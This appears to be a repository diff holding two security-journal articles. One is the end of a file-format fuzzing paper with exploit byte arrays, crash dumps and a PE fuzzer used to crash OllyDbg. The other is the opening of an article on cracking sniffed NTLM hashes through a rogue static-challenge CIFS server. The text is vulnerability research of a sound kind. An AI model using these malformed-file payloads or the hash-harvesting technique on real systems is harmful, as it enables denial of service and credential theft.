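    if (number_of_certs + 1u > UINT32_MAX / CERTDATA_SIZE)
        return -1;                              /* *16 would wrap */
    *out = (number_of_certs + 1u) * CERTDATA_SIZE;
    return 0;
}
```

With NumberOfCerts set to 0xffffffff the unchecked size is 0, so the
alloc_size - 1 passed to memcpy in line 64 becomes 0xffffffff.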
|
||||
|
||||
|
||||
Constructing a fake valid CERTFF chunk and properly placing it in a dat
|
||||
file will be what most of the work consists of when preparing a file
format exploit. The first 6 bytes of our file will remain the same, so
we can assume our exploit will look something like the following:
|
||||
|
||||
|
||||
[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...]
|
||||
[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ]
|
||||
|
||||
|
||||
unsigned char exploit_dat1[] = {
|
||||
/* header info */
|
||||
0x4f, 0x50, 0x00, 0x00, 0x01, 0x00,
|
||||
/* our fake NumberOfCerts followed by our certs pointer */
|
||||
0xff, 0xff, 0xff, 0xff,
|
||||
0x0a, 0x00,
|
||||
/* One valid cert */
|
||||
0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
|
||||
/* our length */
|
||||
0x00, 0x07,
|
||||
/* where we can write our data to PointerToDer*/
|
||||
0x00, 0x26,
|
||||
/* DataPtr useless to us */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
};
|
||||
|
||||
unsigned char exploit_dat2[] = {
|
||||
/* fake certs for fill */
|
||||
0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00,
|
||||
/* our length */
|
||||
0x00, 0x10,
|
||||
/* where we can write our data to PointerToDer*/
|
||||
0x26, 0x04,
|
||||
/* DataPtr useless to us */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
};
|
||||
|
||||
|
||||
The pseudo code below denotes the structure of the rest of the binary
|
||||
dat file.
|
||||
|
||||
|
||||
/* buf is the output buffer and buf_len its size in bytes */
for (i = sizeof(exploit_dat1); i + sizeof(exploit_dat2) <= buf_len; i += sizeof(exploit_dat2))
    memcpy(buf + i, exploit_dat2, sizeof(exploit_dat2));
|
||||
|
||||
|
||||
In short, the code copies the contents of our second structure
repeatedly, starting right after the first structure, until the end of
the buffer is reached. The following displays a run of the utility used
correctly, followed by a run against the malicious certificates db file.
|
||||
|
||||
|
||||
(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat
|
||||
req1.DE of length: 657 is being written to disk...
|
||||
req2.DE of length: 649 is being written to disk...
|
||||
req3.DE of length: 653 is being written to disk...
|
||||
req4.DE of length: 651 is being written to disk...
|
||||
req5.DE of length: 652 is being written to disk...
|
||||
(xbud@yakuza <~/code/random>) $
|
||||
|
||||
(gdb) r 2badcertdb.dat
|
||||
Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0xb7e1267f in memcpy () from /lib/tls/libc.so.6
|
||||
(gdb) x/i $pc
|
||||
0xb7e1267f <memcpy+47>: repz movsl %ds:(%esi),%es:(%edi)
|
||||
(gdb)i reg
|
||||
eax 0xffffffff -1
|
||||
ecx 0x3fff9c02 1073716226
|
||||
edx 0x804a008 134520840
|
||||
...
|
||||
|
||||
|
||||
Reconstructing our memcpy(buf, edx (our fake certs), eax (-1)): the value
stored in eax is -1, which is treated as an unsigned value inside memcpy,
so nearly 4GB of data are copied into our destination buffer of only
0x800 bytes in size.
|
||||
|
||||
= Case Study
|
||||
= The Microsoft PE/COFF Headers
|
||||
|
||||
|
||||
There are a number of documents and tools out there that explain the
|
||||
structure of Microsoft's infamous PE (Portable Executable) and old
|
||||
Unix Style COFF (Common Object File Format) header. As such, I will
|
||||
refrain from elaborating on what each element inside each structure
|
||||
does. Instead, I will focus on the critical sections that may allow
|
||||
an attacker to alter the contents of header elements specifically to
|
||||
break implementations of PE/COFF parsers.
|
||||
|
||||
|
||||
With that in mind we can now begin our journey into the world of PE.
|
||||
At file offset 0x3C, as specified in MS's pecoff.doc, there is a pointer
to the four byte signature PE\0\0. Immediately after the signature of the
image file, there is a standard COFF header of the following format:
|
||||
|
||||
|
||||
typedef struct _IMAGE_FILE_HEADER //(Coff)
|
||||
{
|
||||
unsigned short Machine;
|
||||
unsigned short NumberOfSections;
|
||||
unsigned int TimeDateStamp;
|
||||
unsigned int PointerToSymbolTable;
|
||||
unsigned int NumberOfSymbols;
|
||||
unsigned short SizeOfOptionalHeader;
|
||||
unsigned short Characteristics;
|
||||
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
|
||||
|
||||
|
||||
Does anything look similar to our hypothetical file format used in
|
||||
the examples above?
|
||||
|
||||
|
||||
NumberOfSections and NumberOfSymbols are both analogous to
|
||||
NumberOfCerts with respect to their own file format. These
|
||||
elements, along with SizeOfOptionalHeader make for interesting
|
||||
attack vectors. Before strolling further along into the COFF Header
|
||||
specifics, it is important to pay a bit more attention to the offset
|
||||
0x3C being referred to in the PECOFF.doc document. It
|
||||
states that the file offset specified at offset 0x3C from
|
||||
the image file, points to the PE signature.
|
||||
|
||||
|
||||
What would happen if this file offset was bogus? What if the offset
|
||||
at offset 0x3C points to fstat(image).st_size + 1 ?
|
||||
We cause the parser to access illegal memory. This bug was present in
|
||||
the majority of the PE Viewers tested. Although the significance of this
|
||||
bug is minimal since the modified binary will no longer execute, picture a
|
||||
scenario where an attacker simply needs to crash an application which
|
||||
happens to preprocess a PE Header. All an attacker must do to trigger
|
||||
this bug is build a fake MZ header, also known as a DOS Stub header, and
|
||||
invalidate the 0x3C offset. The MS-DOS Stub is a
|
||||
valid application that runs under MS-DOS and is placed at the front of the
|
||||
.EXE image. The linker places a default stub here, which prints out the
|
||||
message "This program cannot be run in DOS mode" when the image is run in
|
||||
MS-DOS.
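
A parser can reject a bogus 0x3C value before it ever dereferences it.
The following is a minimal sketch of such a check. The function name
pe_signature_ok is hypothetical, and the file is assumed to be fully
loaded into memory with its real size known (for example from fstat).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PE_POINTER_OFFSET 0x3Cu  /* location of the PE signature offset */

/* Hypothetical helper: returns 1 if the image has an MZ header whose 0x3C
 * field points at a complete "PE\0\0" signature inside the file, 0
 * otherwise. */
static int pe_signature_ok(const unsigned char *image, size_t size)
{
    uint32_t off;

    if (size < PE_POINTER_OFFSET + 4u)
        return 0;                   /* too small to hold the field */
    if (image[0] != 'M' || image[1] != 'Z')
        return 0;                   /* no MS-DOS stub header */

    off = (uint32_t)image[0x3C] | ((uint32_t)image[0x3D] << 8) |
          ((uint32_t)image[0x3E] << 16) | ((uint32_t)image[0x3F] << 24);

    if (off > size || size - off < 4u)
        return 0;                   /* signature would lie outside the file */
    return memcmp(image + off, "PE\0\0", 4) == 0;
}
```

The offset is compared against the size before any subtraction, so a
value such as st_size + 1 is rejected instead of producing a wrapped
length.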
|
||||
|
||||
|
||||
The second element, NumberOfSections, indicates the number of
|
||||
Section Headers this file has mapped. Once again, fuzzing this
|
||||
element with random numbers yields interesting results on tools
|
||||
like MSVC dumpbin.exe, PEView, PE Explorer, msfpescan, etc.
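
The same idea applies to NumberOfSections: before iterating, a parser can
confirm that the claimed section table actually fits in the file. This
sketch assumes the 20 byte COFF header and 40 byte section header sizes
from the PE/COFF specification, a size_t of at least 32 bits, and
already-decoded header fields. The name section_table_fits is
hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define COFF_HEADER_SIZE    20u  /* size of IMAGE_FILE_HEADER */
#define SECTION_HEADER_SIZE 40u  /* size of one section table entry */

/* Hypothetical helper: returns 1 if a section table with
 * number_of_sections entries fits in a file of file_size bytes, given the
 * file offset of the COFF header and the SizeOfOptionalHeader field. */
static int section_table_fits(size_t file_size, size_t coff_offset,
                              uint16_t size_of_optional_header,
                              uint16_t number_of_sections)
{
    size_t table_start, table_len;

    if (coff_offset > file_size || file_size - coff_offset < COFF_HEADER_SIZE)
        return 0;
    table_start = coff_offset + COFF_HEADER_SIZE;
    if (file_size - table_start < size_of_optional_header)
        return 0;
    table_start += size_of_optional_header;

    /* At most 65535 * 40 bytes, which cannot wrap a 32-bit size_t. */
    table_len = (size_t)number_of_sections * SECTION_HEADER_SIZE;
    return table_len <= file_size - table_start;
}
```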
|
||||
|
||||
|
||||
Continuing our dive into PE madness, following the COFF Header there
|
||||
is an OPTIONAL_HEADER also referred to as the PE Header which
|
||||
consists of the following elements:
|
||||
|
||||
|
||||
typedef struct _IMAGE_OPTIONAL_HEADER32 {
|
||||
unsigned short Magic;
|
||||
...
|
||||
unsigned int ImageBase;
|
||||
...
|
||||
unsigned short MajorOperatingSystemVersion;
|
||||
unsigned short MinorOperatingSystemVersion;
|
||||
...
|
||||
unsigned int SizeOfImage;
|
||||
unsigned int SizeOfHeaders;
|
||||
...
|
||||
unsigned int LoaderFlags;
|
||||
unsigned int NumberOfRvaAndSizes;
|
||||
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
|
||||
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
|
||||
|
||||
|
||||
There were a number of elements omitted here for the sake of brevity,
|
||||
most of which aid the loader in identifying the type of file and its
|
||||
core mappings. Please refer to the appendix for more information on
|
||||
what each specific element means. Again, several elements in this
|
||||
structure look interesting enough to play with; however, we will only be
looking at the IMAGE_DATA_DIRECTORY array of entries. In
particular, the first index of that directory contains a pointer to the
EXPORT/IMPORT_DIRECTORY_TABLE structures. The element
NumberOfRvaAndSizes in the structure above refers to the number of
elements in the DataDirectory array. The following is the
EXPORT_DIRECTORY_TABLE structure, which is the last structure
fuzzed for this case study.
|
||||
|
||||
|
||||
|
||||
typedef struct _EXPORT_DIRECTORY_TABLE {
|
||||
unsigned long Characteristics;
|
||||
unsigned long TimeDateStamp;
|
||||
unsigned short MajorVersion;
|
||||
unsigned short MinorVersion;
|
||||
unsigned long NameRVA;
|
||||
unsigned long OrdinalBase;
|
||||
unsigned long NumberOfFunctions;
|
||||
unsigned long NumberOfNames;
|
||||
unsigned long ExportAddressTableRVA;
|
||||
unsigned long ExportNameTableRVA;
|
||||
unsigned long ExportOrdinalTableRVA;
|
||||
} EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE;
|
||||
|
||||
|
||||
The Export Directory Table contains address information that is
|
||||
used to resolve fix-up references to the entry points within this image.
|
||||
The elements NumberOfFunctions and NumberOfNames indicate the obvious, and
again, if something trusts the numbers in this structure without error
checking, unexpected results can occur.
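
One way to avoid trusting these counts is to compare each of them with
the number of bytes really available for its table. The sketch below
assumes the entry sizes from the PE/COFF specification (4 byte address
and name pointer entries, 2 byte ordinals) and assumes the caller has
already converted each table RVA to a file offset. The names entries_fit
and export_counts_ok are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if count entries of entry_size bytes fit in avail bytes.
 * Division is used so that a huge count cannot wrap a product. */
static int entries_fit(size_t avail, uint32_t count, size_t entry_size)
{
    return entry_size != 0 && count <= avail / entry_size;
}

/* Hypothetical check for the three export tables. Each *_avail argument is
 * the number of bytes between that table's file offset and the end of the
 * file. */
static int export_counts_ok(uint32_t number_of_functions,
                            uint32_t number_of_names,
                            size_t address_avail, size_t name_avail,
                            size_t ordinal_avail)
{
    return entries_fit(address_avail, number_of_functions, 4) && /* RVAs */
           entries_fit(name_avail, number_of_names, 4) &&        /* RVAs */
           entries_fit(ordinal_avail, number_of_names, 2);       /* ordinals */
}
```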
|
||||
|
||||
= Introducing breakdance.c
|
||||
|
||||
|
||||
Although file fuzzing is relatively simple, tools help reduce the amount
|
||||
of time it takes for you to reconstruct a format to reach deep into a
|
||||
section buried within several structures. I typically use
|
||||
xxd -i, hd (hexdump), or shred (hexeditor)
|
||||
for windows to reconstruct a binary image and fuzz the structures
|
||||
manually, but I decided to develop a tool to do the work for me in the
|
||||
case of PE. The following options are available:
|
||||
|
||||
|
||||
Usage: ./breakdance [parameters]
|
||||
Options:
|
||||
-v verbose
|
||||
-o [file] File to write to (defaults) out.ext
|
||||
-f [file] File to read from
|
||||
-e [value] Modify Export Directory Table's number
|
||||
of functions and number of names
|
||||
-p Print sections of a PE file and exit
|
||||
-c Create new section (.pepe) not to be used with -m
|
||||
-s [section] Section to overwrite (can be used with -c)
|
||||
-m [section] [value]
|
||||
-n [length] Fuzz Export Directory Table's Strings
|
||||
Modify [section] with [int] where:
|
||||
section is one of [image_start] [number_of_sections]
|
||||
|
||||
ex. ./breakdance -v -o out -f pebin -m "image_start" 65536
|
||||
ex. ./breakdance -v -o out -f pebin -c -s .rdata
|
||||
|
||||
[Warning if -o option isn't provided with mod options, changes are discarded]
|
||||
|
||||
|
||||
The following is a list of binary parsers affected by the fuzzing options
provided by breakdance.c. The list is by no means a comprehensive survey
of PE parsers, but it is all I tested against. The fuzzing capabilities
are rather minimal considering the number of structures and elements
defined by the PE/COFF specification; however, it is enough to
demonstrate how broken binary parsers can be.
|
||||
|
||||
|
||||
+--------------+-----------------+-------------------+
| Tool Name    | Vendor          | Section           |
+--------------+-----------------+-------------------+
| PE View      | Wayne Radburn   | All               |
| MSVC dumpbin | Microsoft       | All               |
| OllyDbg      | Oleh Yuschuk    | NumberOfFunctions |
| PE Explorer  | Heaventools.com | NumberOfSections  |
+--------------+-----------------+-------------------+
|
||||
|
||||
|
||||
= Affected Toolsets
|
||||
|
||||
|
||||
|
||||
Although I can almost guarantee other parsers are just as buggy,
|
||||
this selection is pretty well known and should suffice as a
|
||||
demonstration. The only issue I will elaborate on is the OllyDbg
denial of service attack. This issue is interesting due to the fact
that even after modifying the PE Image to DoS OllyDbg, the binary
itself is still executable. This can be leveraged as an attack
vector against reverse engineers who rely on OllyDbg to reverse
binaries. The following is a run of breakdance against a DLL.
|
||||
|
||||
|
||||
(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \
|
||||
/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll
|
||||
|
||||
...
|
||||
|
||||
NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647
|
||||
Dumping 348160 bytes
|
||||
|
||||
(xbud@yakuza <~/code/random>) $
|
||||
|
||||
-- Inside WinDbg --
|
||||
|
||||
This exception may be expected and handled.
|
||||
eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000
|
||||
eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
|
||||
|
||||
*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE
|
||||
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
|
||||
C:\tools\odbg110\OLLYDBG.EXE -
|
||||
|
||||
OLLYDBG!Createlistwindow+0x1bb4:
|
||||
0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=????
|
||||
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4
|
||||
00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b
|
||||
|
||||
|
||||
= Conclusions
|
||||
|
||||
|
||||
The general rule of thumb here is not to trust any user modifiable
|
||||
data. The trust between application and input components such as
|
||||
sockets, file I/O, named pipes etc. should always be minimal and at
|
||||
an extreme, should be considered dangerous. The fact that a file
|
||||
format specification exists is not an excuse to assume all data
|
||||
gathered from an alleged file is valid. Validate your input against
|
||||
a working ruleset, and if the assertion fails, raise an exception.
|
||||
Keeping your code simple means accepting only valid input and denying
all variants.
|
||||
|
||||
|
||||
All the code referenced is provided in the attached tar ball. A
safer version of the library for parsing the hypothetical file
|
||||
format developed for this paper is included for demonstration
|
||||
purposes.
|
||||
|
||||
= Bibliography
|
||||
|
||||
|
||||
OSVDB. OSVDB Advisory Descriptions
|
||||
http://www.osvdb.org
|
||||
|
||||
|
||||
Microsoft Corporation. PECoff Specification
|
||||
http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
|
||||
|
||||
|
||||
blexim. Integer Overflows
|
||||
http://www.phrack.org/show.php?p=60&a=10
|
458
uninformed/3.4.txt
Normal file
|
@ -0,0 +1,458 @@
|
|||
Attacking NTLM with Precomputed Hashtables
|
||||
warlord
|
||||
warlord@nologin.org
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
|
||||
Breaking encrypted passwords has been of interest to hackers for a long
|
||||
time, and protecting them has always been one of the biggest security
|
||||
problems operating systems have faced, with Microsoft's Windows being no
|
||||
exception. Due to errors in the design of the password encryption
scheme, especially in the LanMan(LM) scheme, Windows has a bad track
record in this field of information security. Especially in the last
couple of years, the outdated DES encryption algorithm that LanMan is
based on has faced more and more processing power in the average
household. Combined with ever increasing harddisk size, this has made it
crystal clear that LanMan nowadays is not just outdated, but even
antiquated.
|
||||
|
||||
Until now, breaking the LanMan hashed password required somehow
|
||||
accessing the machine first of all, and grabbing the password file,
|
||||
which didn't render remote password breaking impossible, but as a remote
|
||||
attacker had to break into the system first to get the required data, it
|
||||
didn't matter much. This paper will try to change this point of view.
|
||||
|
||||
|
||||
2) The design of LM and NTLM
|
||||
|
||||
2.1) The LanMan disaster
|
||||
|
||||
|
||||
By default Windows stores all users' passwords with two different hashing
algorithms: the historically weak LanMan hash and the more robust MD4.
The LanMan hash is based on DES and has been described in Mudge's rant
on the topic. A brief recap of the LM hash is below, though those
unfamiliar with LM will probably want to read Mudge's description.
|
||||
|
||||
First of all, Windows takes a password and makes sure it's 14 bytes
|
||||
long. If it's shorter than 14 bytes, the password is padded with null
|
||||
bytes. Brute forcing up to 14 characters can take a very long time, but
|
||||
two factors make this task much easier. First, not only is the set of
|
||||
possible characters rather small, Microsoft further reduces it by making
|
||||
sure a password is stored all uppercase. That means "test" is the same
|
||||
as "Test" is the same as "tesT" is the same as...well...you get the
|
||||
idea. Second, the password is not really 14 bytes in size. Windows
|
||||
splits it up into two times 7 bytes. So instead of having to brute force
|
||||
up to 14 bytes, an attacker only has to break 7 bytes, twice. The
|
||||
difference is (keyspace^14) versus (keyspace^7)*2. That's a huge
|
||||
difference.
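
To put numbers on that difference, the two search spaces can be computed
directly. This is a small worked sketch, assuming a 36 character
alphanumeric set (A-Z and 0-9 after uppercasing). The function names are
hypothetical, and double is used because the unsplit figure does not fit
in 64 bits.

```c
/* Number of candidates when all `length` positions must be searched at
 * once: charset_size raised to the power of length. */
static double keyspace_full(unsigned charset_size, unsigned length)
{
    double total = 1.0;
    unsigned i;

    for (i = 0; i < length; i++)
        total *= (double)charset_size;
    return total;
}

/* Number of candidates for LM: two independent 7 character halves. */
static double keyspace_lm_split(unsigned charset_size)
{
    return 2.0 * keyspace_full(charset_size, 7);
}
```

For 36 characters the split search covers 2 * 36^7 = 156728328192
candidates, while a true 14 character search would cover 36^14, roughly
6.1 * 10^21.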
|
||||
|
||||
Concerning the keyspace, this paper focuses on the alphanumerical set of
|
||||
characters only, but the entire possible set of valid characters is:
|
||||
|
||||
|
||||
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 %!@\#$%^&*()_-=+`~[]\{}|\:;"'<>,.?/
|
||||
|
||||
|
||||
The next problem with LM stems from the total lack of salting or cipher
|
||||
block chaining in the hashing process. To hash a password the first 7
|
||||
bytes of it are transformed into an 8 byte odd parity DES key. This key
|
||||
is used to encrypt the 8 byte string "KGS!@#$%". The same thing happens with
|
||||
the second part of the password.
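
The 7 byte to 8 byte key transformation mentioned above can be sketched
as follows. This is an illustration of the usual bit-spreading approach
and not code taken from Windows. The name expand_des_key is hypothetical,
and the DES encryption step itself is left out.

```c
#include <stdint.h>

/* Hypothetical helper: expand 7 bytes (56 bits) into an 8 byte DES key.
 * Each output byte carries 7 key bits in its upper bits and an odd
 * parity bit in bit 0. */
static void expand_des_key(const uint8_t in[7], uint8_t key[8])
{
    int i, b, ones;

    key[0] = (uint8_t)(in[0] >> 1);
    key[1] = (uint8_t)(((in[0] & 0x01) << 6) | (in[1] >> 2));
    key[2] = (uint8_t)(((in[1] & 0x03) << 5) | (in[2] >> 3));
    key[3] = (uint8_t)(((in[2] & 0x07) << 4) | (in[3] >> 4));
    key[4] = (uint8_t)(((in[3] & 0x0F) << 3) | (in[4] >> 5));
    key[5] = (uint8_t)(((in[4] & 0x1F) << 2) | (in[5] >> 6));
    key[6] = (uint8_t)(((in[5] & 0x3F) << 1) | (in[6] >> 7));
    key[7] = (uint8_t)(in[6] & 0x7F);

    for (i = 0; i < 8; i++) {
        key[i] = (uint8_t)(key[i] << 1);    /* make room for the parity bit */
        ones = 0;
        for (b = 1; b < 8; b++)
            ones += (key[i] >> b) & 1;
        if ((ones & 1) == 0)
            key[i] |= 1;                    /* force an odd number of set bits */
    }
}
```

Seven null bytes expand to the key 01 01 01 01 01 01 01 01, which is why
every empty password half produces the same ciphertext.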
|
||||
|
||||
This lack of salting creates two interesting consequences. Obviously
|
||||
this means the password is always stored in the same way, and just begs
|
||||
for a typical lookup table attack. The other consequence is that it is
|
||||
easy to tell if a password is bigger than 7 bytes in size. If not, the
|
||||
last 7 bytes will all be null and will result in a constant DES hash of
|
||||
0xAAD3B435B51404EE.
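
Checking for that constant takes a single comparison. The following is a
minimal sketch, assuming the 16 byte LM hash is already available as raw
bytes. The names LM_EMPTY_HALF and lm_password_is_short are hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* LM hash of an all-null 7 byte half, as given in the article. */
static const uint8_t LM_EMPTY_HALF[8] = {
    0xAA, 0xD3, 0xB4, 0x35, 0xB5, 0x14, 0x04, 0xEE
};

/* Hypothetical helper: returns 1 if the second half of a 16 byte LM hash
 * is the constant produced by seven null bytes, meaning the password has
 * at most 7 characters. */
static int lm_password_is_short(const uint8_t lm_hash[16])
{
    return memcmp(lm_hash + 8, LM_EMPTY_HALF, 8) == 0;
}
```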
|
||||
|
||||
As I already pointed out, LM has been extensively documented.
"L0phtcrack" and "John the Ripper" are both capable brute force tools
for breaking these hashes, and Philippe Oechslin of the ETH Zuerich was the
|
||||
first to precompute LM lookup tables that allow breaking these hashes in
|
||||
seconds.
|
||||
|
||||
2.2) NTLM
|
||||
|
||||
|
||||
Microsoft attempted to address the shortcomings of LM with NTLM. Windows
|
||||
NT introduced the NTLM(NT LanManager) authentication method to provide
|
||||
stronger authentication. The NTLM protocol was originally released in
|
||||
version 1.0(NTLM), and was changed and fortified in NT SP4 as NTLMv2.
|
||||
When exchanging files between hosts in a local area network, printing
|
||||
documents on a networked printer or sending commands to a remote system,
|
||||
Windows uses a protocol called CIFS - the Common Internet File System.
|
||||
CIFS uses NTLM for authentication.
|
||||
|
||||
In NTLM, the protocol covered in this document, the authentication works
|
||||
in the following manner. When the client connects to the server and
|
||||
requests a new session, the server replies with a positive session
|
||||
response. Next, the client sends a request to negotiate a protocol for
|
||||
one of the many dialects of the SMB/CIFS family by providing a list of
|
||||
dialects that it understands. The server picks the best out of those and
|
||||
sends the client a response that names the protocol to use, and includes
|
||||
a randomly generated 8 byte challenge.
|
||||
|
||||
In order to log in now, the client sends the username in plaintext(!),
|
||||
and also the password, hashed NTLM style. The NTLM hash is generated in
|
||||
the following manner:
|
||||
|
||||
|
||||
[UsersPassword]->[LMHASH]->[NTLM Hash]
|
||||
|
||||
|
||||
The NTLM hash is produced by the following algorithm. The client takes
|
||||
the 16 byte LM hash, and appends 5 null bytes, so that the result is a
|
||||
string of 21 bytes length. Then it splits those 21 bytes into 3 groups
|
||||
of 7 bytes. Each 7 byte string is turned into an 8 byte odd parity DES
|
||||
key once again. Now the first key is used to encrypt the challenge with
|
||||
the DES algorithm, producing an 8 byte hash. The same is done with keys
|
||||
2 and 3, so that there are two additional 8 byte hashes. These 3 hashes
|
||||
are simply concatenated, resulting in a single 24 byte hash, which is
|
||||
the one being sent by the client as the encrypted password.
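
The padding and splitting step of this algorithm can be sketched in a few
lines. The function name split_hash_into_key_material is hypothetical,
and the DES key expansion and encryption of the challenge are
deliberately left out.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: pad a 16 byte hash with 5 null bytes and split the
 * resulting 21 bytes into three 7 byte groups, each of which later
 * becomes one DES key. */
static void split_hash_into_key_material(const uint8_t hash[16],
                                         uint8_t groups[3][7])
{
    uint8_t padded[21];
    int i;

    memcpy(padded, hash, 16);
    memset(padded + 16, 0, 5);
    for (i = 0; i < 3; i++)
        memcpy(groups[i], padded + 7 * i, 7);
}
```

Note that the third group only ever contains 2 bytes of the hash
followed by the 5 null bytes of padding.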
|
||||
|
||||
Mudge already pointed out why this is really stupid, and I'll just
|
||||
recapitulate his reasons here. An attacker capable of sniffing traffic
|
||||
can see the username, the challenge and the 24 byte hash.
|
||||
|
||||
First of all, as stated earlier, if the password is less than 8 bytes,
|
||||
the second half of the LM hash always is 0xAAD3B435B51404EE. For the
|
||||
purpose of illustration, let's assume the first part of the hash is
|
||||
0x1122AABBCCDDEEFF. So the entire LM hash looks like:
|
||||
|
||||
|
||||
-------------------------------------------
|
||||
| 0x1122AABBCCDDEEFF | 0xAAD3B435B51404EE |
|
||||
-------------------------------------------
|
||||
|
||||
|
||||
When transforming this into an NTLM hash, the first 8 bytes of the new
|
||||
hash are based solely on the first 7(!) bytes of the LM hash. The second
|
||||
8 byte chunk of the NTLM hash is based on the last byte of the first LM
|
||||
hash, and first 6 bytes of the second LM hash. Now there are 2 bytes of
|
||||
the second LM hash left. Those two, padded with 5 null bytes and used to
|
||||
encrypt the challenge, form the third 8 byte chunk of the NTLM hash.
|
||||
That means in the example this padded LM hash
|
||||
|
||||
|
||||
------------------------------------------------------
|
||||
| 0x1122AABBCCDDEE | FFAAD3B435B514 | 04EE0000000000 |
|
||||
------------------------------------------------------
|
||||
|
||||
|
||||
is being turned into the 24 byte NTLM hash. If the password is smaller
|
||||
than 8 characters in size, the third part, before being hashed with the
|
||||
challenge to form the NTLM hash, will always look like this. So in order
|
||||
to test whether the password is smaller than 8 bytes, it's enough to take
|
||||
this value, the 0x04EE0000000000, and use it to encrypt the challenge
|
||||
that got sniffed from the wire. If the result equals the third part of
|
||||
the NTLM hash which the client sent to the server, it's a pretty safe
|
||||
bet to say the password is no longer than 7 chars. It's even possible to
|
||||
make sure it is. Assuming from the previous result that the second LM
|
||||
hash looks like 0xAAD3B435B51404EE, the second chunk of the 24 byte NTLM
|
||||
hash is based on 0x??AAD3B435B514. The only part unknown is the first
|
||||
byte, as this one is based on the first LM hash. One byte, that's 256
|
||||
permutations. By brute forcing those up to 256 possibilities as the
|
||||
value of the first byte, and using the resulting key to encrypt the
|
||||
known challenge once again, one should eventually stumble over a result
|
||||
that's the same as the second 8 bytes of the NTLM hash. Now one can rest
|
||||
assured, that the password really is smaller than 8 bytes. Even if the
|
||||
password is bigger than 7 bytes, and the second LM hash does not end
|
||||
with 0x04EE as a result, creating all possible 2 byte combinations, padding
|
||||
them with 5 null bytes and hashing those with the challenge until the
|
||||
final 8 byte chunk of the NTLM hash matches will easily reveal the final
|
||||
2 bytes of the LM hash, with no more than 64k permutations.
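
The padding and splitting step described in this section can be sketched in a few lines of Python. This is only an illustration of the byte layout, not the author's tool: the function names pad_and_split and expand_des_key are made up for this example, and the DES encryption of the challenge itself is left out because the Python standard library does not ship DES.

```python
def pad_and_split(lm_hash: bytes) -> list:
    """Pad a 16-byte LM hash with 5 null bytes and cut it into three 7-byte groups."""
    if len(lm_hash) != 16:
        raise ValueError("LM hash must be 16 bytes")
    padded = lm_hash + b"\x00" * 5
    return [padded[i:i + 7] for i in range(0, 21, 7)]


def expand_des_key(seven: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes and set each low bit for odd parity."""
    if len(seven) != 7:
        raise ValueError("need exactly 7 bytes")
    bits = int.from_bytes(seven, "big")
    key = bytearray()
    for i in range(8):
        # Take the next 7 key bits, most significant group first.
        chunk = (bits >> (49 - 7 * i)) & 0x7F
        byte = chunk << 1
        # Odd parity: the number of set bits in the finished byte must be odd.
        if bin(byte).count("1") % 2 == 0:
            byte |= 1
        key.append(byte)
    return bytes(key)


# The example LM hash used in the text above.
example = bytes.fromhex("1122AABBCCDDEEFFAAD3B435B51404EE")
groups = pad_and_split(example)
for group in groups:
    print(group.hex().upper(), "->", expand_des_key(group).hex().upper())
```

The third group only ever contains two unknown bytes, which is why at most 65536 candidates have to be tried for it.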
|
||||
|
||||
2.3) The NTLM challenge
|
||||
|
||||
|
||||
The biggest difference between the way the LM and the NTLM hashing
|
||||
mechanism works is the challenge. In NTLM the challenge acts like a
|
||||
salt in other cryptographic implementations. This throws a major wrench
|
||||
in our pre-computing table designs, adding 2^64 permutations to the
|
||||
equation.
|
||||
|
||||
3.0) Breaking NTLM with precomputed tables
|
||||
|
||||
3.1) Attacking the first part
|
||||
|
||||
Precomputing tables for NTLM has just been declared pretty much
|
||||
impossible with today's computing resources. The problem is pre-computing
|
||||
every possible hash value (and then, of course storing those values even
|
||||
if computation was possible). By applying a trick to remove the
|
||||
challenge from the equation however, precomputing NTLM hashes becomes
|
||||
almost as easy as the creation of LM tables. By writing a rogue CIFS
|
||||
server that hands out the same static challenge to every client that
|
||||
tries to connect to it, the problem has static values all over the place
|
||||
once again, and hashtable precomputation becomes possible.
|
||||
|
||||
The following screenshot depicts a proof of concept implementation that
|
||||
accepts an incoming CIFS connection, goes through the protocol
|
||||
negotiation phase with the connecting client, sends out the static
|
||||
challenge, and disconnects the client after receiving username and NTLM
|
||||
hash from it. The server also logs some more information that the client
|
||||
conveniently sends along.
|
||||
|
||||
|
||||
IceDragon wincatch bin/wincatch
|
||||
This is Alpha stage code from nologin.org
|
||||
Distribution in any form is denied
|
||||
|
